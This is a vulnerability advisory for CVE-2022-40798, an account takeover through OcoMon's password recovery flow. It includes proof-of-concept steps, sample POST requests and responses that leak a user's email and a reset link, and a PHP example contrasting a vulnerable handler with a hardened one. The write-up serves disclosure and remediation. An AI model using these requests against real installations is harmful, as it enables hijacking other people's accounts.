CVE-2022-40798 - OcoMon Account Takeover

OcoMon 4.0RC1 is vulnerable to Incorrect Access Control. Through a single password recovery request, a user can obtain another user's real email address; sending the same request again with that correct email makes account takeover possible.

Category: CVE
Tags: #csrf #vulnerability #php

Description

Through the password recovery flow it is possible to obtain a token that resets the password of any user.

Bug - 1

The vulnerability occurs because the application validates the supplied email against the database and, on a mismatch, returns the user's real email to the requester in the response.

Bug - 2

If the username and email are valid, the application returns the password reset link to the requester in the HTTP response instead of sending it by email.
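The two bugs above are easiest to see side by side. The following is an added illustration, not OcoMon's code: a reconstructed handler with the same two defects next to a hardened version that never echoes account data or the reset link. The table names, the $db PDO connection and the send_mail() helper are assumptions.

```php
<?php
// Added example, not OcoMon's code. $db is an assumed PDO connection,
// send_mail() an assumed mailer helper, and the table layout is hypothetical.

// VULNERABLE pattern (reconstructed): on an email mismatch the stored email is
// returned (Bug 1); on a match the reset link is returned to the caller (Bug 2).
function recovery_vulnerable(PDO $db, string $login, string $email): array {
    $st = $db->prepare('SELECT user_id, email FROM users WHERE login_name = ?');
    $st->execute([$login]);
    $u = $st->fetch(PDO::FETCH_ASSOC);
    if (!$u) {
        return ['field_id' => 'login_name'];
    }
    if ($u['email'] !== $email) {
        return ['field_id' => 'email', 'email' => $u['email']]; // leaks real email
    }
    $code = $u['user_id'] . '|' . bin2hex(random_bytes(16));
    return ['forget_link' => 'https://ocomon.site/setNewPass.php?code=' . $code];
}

// HARDENED: identical reply whether or not the login/email pair exists, nothing
// account-specific in the body, token stored only as a hash and sent by email.
function recovery_hardened(PDO $db, string $login, string $email): array {
    $st = $db->prepare('SELECT user_id, email FROM users WHERE login_name = ?');
    $st->execute([$login]);
    $u = $st->fetch(PDO::FETCH_ASSOC);

    // hash_equals() compares in constant time so the match does not leak
    // through timing; the reply below does not depend on the outcome.
    if ($u && hash_equals($u['email'], $email)) {
        $token = bin2hex(random_bytes(32));
        $ins = $db->prepare(
            'INSERT INTO reset_tokens (user_id, token_hash, expires_at) VALUES (?, ?, ?)'
        );
        $ins->execute([$u['user_id'], hash('sha256', $token), time() + 900]); // 15 min
        send_mail(
            $u['email'],
            'Password reset',
            'https://ocomon.site/setNewPass.php?code=' . urlencode($token)
        );
    }

    // Generic response for every input: no email, no user_id, no link.
    return ['message' => 'If the account exists, a reset link has been emailed.'];
}
```

The reset endpoint then looks up hash('sha256', $code) in reset_tokens, checks expires_at, and deletes the row on use, so the token in the email is the only way to reach the password change.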

PoC

  • Access "Esqueci minha senha" (forgot my password).

  • Enter a valid username (for example: admin) and a fake email address.

  • The user's real email is exposed in the response.

  • Send the request again, replacing the fake email with the user's real email.

  • The response contains the link to change the user's password; accessing it allows the password to be changed.

Examples:

URL: https://ocomon.site/includes/common/require_access_recovery_process.php

DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&[email protected]&action=require_recovery

RESPONSE: {"action":"require_recovery","field_id":"email","login_name":"admin","email":"[email protected]","user_id":"1","name":"Administrador do Sistema","mail_to":"[email protected]"}


URL: https://ocomon.site/includes/common/require_access_recovery_process.php
 
DATA: csrf=qgBhHao%2BUlza4vm2VFTQZYs7V8A%3D&csrf_session_key=csrf_token&login_name=admin&[email protected]&action=require_recovery
 
RESPONSE: {"action":"require_recovery","field_id":"","login_name":"admin","email":"[email protected]","user_id":"1","name":"Administrador do Sistema","mail_to":"[email protected]","rand":"b39abfbd697e566d178e678462b0b6c1","forget_link":"https:\/\/ocomon.site\/setNewPass.php?code=1|b39abfbd697e566d178e678462b0b6c1"}

FIX

https://ocomonphp.sourceforge.io/downloads/

Related news

CVE-2023-33558: GitHub - ninj4c0d3r/OcoMon-Research

An information disclosure vulnerability in the component users-grid-data.php of Ocomon before v4.0.1 allows attackers to obtain sensitive information such as e-mails and usernames.
